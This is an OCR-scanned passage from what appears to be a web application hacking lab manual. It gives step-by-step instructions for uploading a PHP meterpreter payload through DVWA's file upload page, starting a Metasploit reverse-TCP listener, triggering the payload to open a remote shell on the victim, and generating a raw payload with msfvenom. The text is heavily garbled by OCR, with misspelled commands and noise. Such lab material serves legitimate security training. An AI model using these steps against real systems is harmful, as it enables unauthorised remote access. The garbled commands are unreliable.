Select File Upload option from the left pane and click Browse. bution to vpload filet show in the screenshot: Ta RN BW a NT TT SPR RTS vey Fa wesnoe en Plt Soty tale Nas Wat wi 8 Wig aor = MES a in 14, Fle Upload window appears, selec the payioad file (here upload.php) and dick Open. Fi Upload 4 @root [mBESMEp » Alles = ‘GIL Med ‘iti ing snd Gemems Caps©yEme Titers enor cy PoeMode 14 Machng We Appeatons 15, You can see the ile has been selected for uploal. Now lick the Upload button to uplond the file tothe database, as shown in the sereenshot: FE FS GT. BST STE IN TT TITAS Bima age feo minions setee oversee slomnie ret etnn Nets Nea fi Raton Bem = | = “More Information WES C—O 16. You will sce a message that the file has been uplonded successful, with the location of the fle, Note the lneston of the file and minimize the brouser window. a a a favetie ren UE Pps vets Moin ert Nein ans iat Ob Aton mo = Vulnerability: File Upload Sa Mor information CORES Mea SE ad Taina adig ed Coamo Oa Tita red Repent sy tsMoti 14. Mackng Wo Appetins 17, Launch 2 Terminal wiadow and type mefeonsole, Hit Entor to un the Metasploit Framework. 18. Now youhave to set up listener so that you can establish a meterpreter ‘session with your victim, Follow the steps listed below to setup alistener ‘sing dhe msf eommand line A. Type use multimandier and hit Enter. |B. ‘Type sot payload phpimetorproterroverse top and hit Enter. G. Type sot meet 10.10.10.11 and hit Entor. D. Typeset iport aaa and hit Enter E, Now to sar the lsener ype mum and hit EnterMoai 14 Hacong We Aspens 19, Now dace listener is up and running, open up the Frofox browser and i a new tub, ype the location of the uploaded fle (hore httpr40.10.10.12:8080!drwahackabloluploadsiupload.php) inthe adress bar and press Entor to exccut the uploaded payload. A ————s 7-9] Cn sesee | aerate yep eee BCLS Opn yal ein tame 20, When you switch buck 10 the terminal window, you will sce that a rmeterpreter session has been exuablshed with the viet system, as shown the screenshot guar ooo] 21, In the meterpreter command line, type aysinf and hit Enter 0 view the system details ofthe vc. Close all windows to exit TR Too] 22, Open 2 now Terminal window, type _mufvenom Phpimotorprotorrovorso tep Ihost=10.10.10-11 Iport=3333 4 raw ard hit tor, 0 generate the x payload Cs a ‘Ca aa ge Ti Tag acne nil SyCoH a Mand Mott 6 Hachng Vib Aptetons 2A, Selet the raw payload, sight dick and eopy tas shown inthe screenshot FOURESIS Gp mea 24, Open Leatpad from the taskbar and paste the paplond copied in the previous Sse aeaina a« Seay om Sic en tate hel Gd, ee tae aemaeeei aera a oa seeped ti 25, Clk File Save A. frm the men bat, 0} he is entiabecsti { $8.0 81 (ten /4si0) Sete he tan 8 at 2 ttc susten (Sty {cate strum lon «trea ae dnchypue(h} atea (ati ‘i tingid Cnememns Cappy HEE Mir noonat upeactont anc ae